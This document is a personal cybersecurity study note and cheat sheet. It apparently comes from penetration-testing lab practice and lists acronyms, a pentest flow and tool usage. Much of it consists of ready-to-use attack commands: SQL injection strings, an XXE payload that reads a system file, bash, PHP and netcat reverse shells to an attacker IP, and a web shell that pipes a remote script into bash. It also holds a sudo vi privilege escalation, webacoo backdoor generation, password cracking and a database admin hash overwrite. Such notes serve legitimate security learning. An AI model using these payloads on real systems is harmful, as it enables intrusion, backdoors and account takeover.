This is the multi-page printable view of this section. Click here to print.
Cyber Security
My learn cyber security note
1 - Blue Team
- Social Engineering
- OSINT (Open-source intelligence)
- Google Hacking
- Good Habit ()
Google Hacking
Ref:
DFIR (Digital Forensics and Incident Response)
APT (Advanced Persistent Threat)
video: APT攻擊:一場沒有中立國的戰爭(真實案例模擬)
IR (Incident Response)
- Internet forensics
- Network equipment log & packet analytics
- Computer forensics
- Disk image analysis
- Memory analysis
- Registry analysis
- File analysis
- Process analysis
- Network analysis
- Log analysis
- Malware forensics
- sample acquisition
- dynamic/static
2 - Cybersecurity Acronyms
Cybersecurity Acronyms & Describe link
APT - Advanced Persistent Threat
AP - access point
BAS - Breach and Attack Simulation
RCE - Remote Code Execution
How Does It Work: Injection Attacks, Deserialization Attacks, Out-of-Bounds Write
VA - Vulnerability Assessment
PT - Penetration test
NTLM - New Technology LAN Manager
UAF - Use-After-Free
Use-After-Free (UAF) is a vulnerability related to incorrect use of dynamic memory during program operation. If after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to hack the program.
AMSI - Antimalware Scan Interface
3 - Penetration Test
Flow
VA -> PT
- Planning and Reconnaissance
- Scanning
- Gaining System Access
- Persistent Access
- Analysis and Reporting
Injection
SQL injection
') or ( '1'='1
') or ( '1'=0
admin'||'1==1
1 or 1 = 1 UNION SELECT user
XSLT Server Side Injection
example
<?xml version = "1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>
<order>
<quantity>1</quantity>
<item>&test;</item>
<address>address</address>
</order>
SSTI (Server Side Template injection)
Tools:
- Java: VikasVarshney/ssti-payload: SSTI Payload Generator
- [Day13] - SSTI - iT 邦幫忙
- SSTI (Server Side Template Injection) - HackTricks
reverse shell
bash
bash -c "bash -i >& /dev/tcp/{your_IP}/443 0>&1"
php
<?php system('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc [ip] [port] > /tmp/f; rm /tmp/f'); ?>
Web shell
Dysco.php?cmd=curl ${your_IP}:8000/shell.sh|bash
Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
vi
# is `sudo -l`
# User postgres may run the following commands on vaccine:
# (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
# step 1
vi
:set shell=/bin/sh
:shell
# step 2
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:set shell=/bin/sh
:shell
SSH tunnel
# windows
# linux
lsof -i -n | egrep '\<ssh\>'
139,445 - Pentesting SMB
# show smb file
smbmap -R -u "hazard" -p "stealth1agent" -H $ip
# get user list
# https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py
python lookupsid.py hazard:[email protected]
Program Language
What can you do when you hack into the server
See below
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color
export PATH="/tmp:$PATH"; echo $PATH;
whoami
sudo -l
ps aux
id
groups
cat /etc/passwd | grep -v "nologin\|false\|sync"
timeout 5s ...
ss -tul
sudo PATH="/tmp:$PATH" /usr/bin/whoami
4 - Tools Organization
Content
01 - Information Gathering: 💲Nmap - 💲Netcat (nc), 💲Recon-NG
DNS Analytics:
Live Host Identification: 💲ping
02 - Vulnerability Analysis:📦Nessus, 📦Open VAS
03 - Web Application Analysis: 📦OWASP ZAP, 📦burpsuite, 💲sqlmap
- Web Crawlers & Directory Bruteforce: 💲gobuster, 💲ffuf, 📒💲dirsearch
- Web Vulnerability Scanners: 💲whatweb
05 - Password Attacks: 💲John, 💲zip2john
07 - Reverse Engineering: 💲jd-gui
09 - Sniffing & Spoofing: 💲responder, 💲tcpdump, 📦wireshark
10 - Post Exploitation: 💲evil-winrm
- Web Backdoors: 💲webacoo
14 - System Services: 💲MetaSploit
Usual Applications: #PowerShell(pwsh)
Storage Service: 💲AWS-S3, 💲mysql, 💲redis-cli, 💲smbclient, 💲mongo, 💲tftp
File & Data: ASCII, 💲base64, 💲exiftool
01 - Information Gathering
DNS Analytics
- Subdomain finder - 9 Enumerating tools hosted online
- Kali linux most used subdomain finder - Ethical-tools
ping
New-Object System.Net.Sockets.TCPClient -Argument "rpi4.shdennlin.com","80"
nmap
sudo nmap --top-ports 3000 -F -sS -sC -sV -n -T4 ${ip}
-F: Fast mode - Scan fewer ports than the default scan
-sS (TCP SYN scan) SYN scan is the default and most popular scan option for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls.
-sC: Performs a script scan using the default set of scripts. It is equivalent to – script=default. Some of the scripts in this category are considered intrusive and should not be run against a target network without permission.
-sV: Enables version detection, which will detect what versions are running on what port.
-n (No DNS resolution)
-T4 prohibits the dynamic scan delay from exceeding 10 ms for TCP ports
dns-brute
nmap --script dns-brute <dns>
NetCat (nc)
Netcat is a versatile utility for working with TCP or UDP data.
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 172.18.0.1 1337 > /tmp/f; rm /tmp/f
nc -nlvp 1337
rm /tmp/f; mkfifo /tmp/f; nc <attack IP> <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f
Translate File
# receive side
sudo nc -lp <port> > <file_name>
# transfer side
nc -v -w 3 <ip> <port> < <file_name>
## windows
type <file_name> | nc.exe -l -p 3333
Recon-NG
02 - Vulnerability Analysis
Nessus
03 - Web Application Analysis
gobuster
directory/file enumeration mode
gobuster dir --url $url --wordlist $tool/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 30
VHOST enumeration mode
gobuster vhost -w ../../tools/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb
ffuf
ffuf -u <url> -w <wordlist.txt> -H "Host: FUZZ.<url>"
dirsearch
https://github.com/maurosoria/dirsearch
sqlmap
sqlmap -u "http://<ip>/dashboard.php?search=any+query" --cookie="" --os-shell
whatweb
whatweb -v -a 3 <url>
05 - Password Attacks
john
Password cracker.
john -w=rockyou.txt hash.txt
hashid
hashid <hash>
hashcat -a 0 -m 0 <hash.txt> /usr/share/eaphammer/wordlists/rockyou.txt
zip2john
zip2john XXX.zip > hash
hydra
wfuzz
wfuzz --sc 200 -w num.txt -H "Cookie: user=FUZZ; role=guest" http://10.129.81.172/uploads/
–sc 200: only show the response with status code 200
mkpasswd
mkpasswd -m sha-512 password
07 - Reverse Engineering
jd-gui
jd-gui XXX.jar
09 - Sniffing & Spoofing
10 - Post Exploitation
webacoo
php RCE
# Gerenate
webacoo -g -o test.php
# connect server
webacoo -t -u http://<url>/test.php
14 - System Services
MetaSploit
sudo msfconsole
msf6 > search xxx
msf6 > use xxx
msf6 xxx(xxx) > show options
msf6 xxx(xxx) > set XX xxx
msf6 xxx(xxx) > run
Usual Applications
PowerShell(pwsh)
# Start a Remote Session
Enter-PSSession -ComputerName COMPUTER -Credential USER -Authentication Negotiate
Storage Service
AWS-S3
aws configureaws s3 ls
smbclient
smbclient --no-pass -L //${ip}
-L: list -U: user
smbclient --no-pass //${ip}/<Folder>
mongo
mongo --host 127.0.0.1:27117
db.adminCommand( { listDatabases: 1 })
use <db>
db.admin.find().forEach(printjson);
db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"<SHA_512 Hash Generated>"}})'
tftp
tftp <ip>
File & Data
ASCII
- convert ASCII values into ASCII characters:
echo "65 66 67" | awk '{ for(i=1;i<=NF;i++) printf("%c",$i); print ""; }'
base64
Encode or decode file or standard input to/from Base64, to standard output.
More information: https://www.gnu.org/software/coreutils/base64.
Encode the contents of a file as base64 and write the result to stdout:
base64 filenameDecode the base64 contents of a file and write the result to stdout:
base64 --decode filenameEncode from stdin:
<command> | base64Decode from stdin:
<command> | base64 --decode
exiftool
Read and write meta information in files.
More information: https://exiftool.org..
Useful Repository
SecLists
https://github.com/danielmiessler/SecLists
SecLists is the security tester’s companion. It’s a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
pspy
https://github.com/DominicBreuker/pspy
Monitor linux processes without root permissions